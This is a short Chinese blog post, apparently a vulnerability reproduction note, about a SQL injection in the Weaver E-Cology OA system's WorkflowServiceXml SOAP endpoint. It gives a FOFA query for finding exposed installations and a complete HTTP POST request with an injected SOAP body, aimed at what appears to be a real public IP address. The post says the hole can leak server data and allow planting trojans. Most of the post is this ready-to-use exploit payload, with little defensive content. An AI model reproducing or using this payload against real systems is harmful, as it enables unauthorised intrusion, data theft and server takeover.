Babing
Published on 2024-08-30 / 4 Visits
0
0

F6-10泛微-E-Cology-SQL

F6-10泛微-E-Cology-SQL

漏洞描述:

泛微E-Cology OA协同商务系统/services/WorkflowServiceXml接口存在SQL注入漏洞,攻击者可以通过漏洞获取服务器内敏感信息导致信息泄露,甚至通过漏洞写入木马病毒获取服务器权限。

fofa语法:

app=“泛微-OA(e-cology)”

漏洞复现:

payload:

POST /services%20/WorkflowServiceXml HTTP/1.1
Host: 122.9.110.160
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: text/xml
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservices.workflow.weaver"> 
  <soapenv:Header/>
    <soapenv:Body>
      <web:getHendledWorkflowRequestList>
        <web:in0>1</web:in0>
        <web:in1>1</web:in1>
        <web:in2>1</web:in2>
        <web:in3>1</web:in3>
        <web:in4>
          <web:string>1=1 AND 2=2</web:string>
        </web:in4>
        </web:getHendledWorkflowRequestList>
    </soapenv:Body>
</soapenv:Envelope>

效果图:
效果图


Comment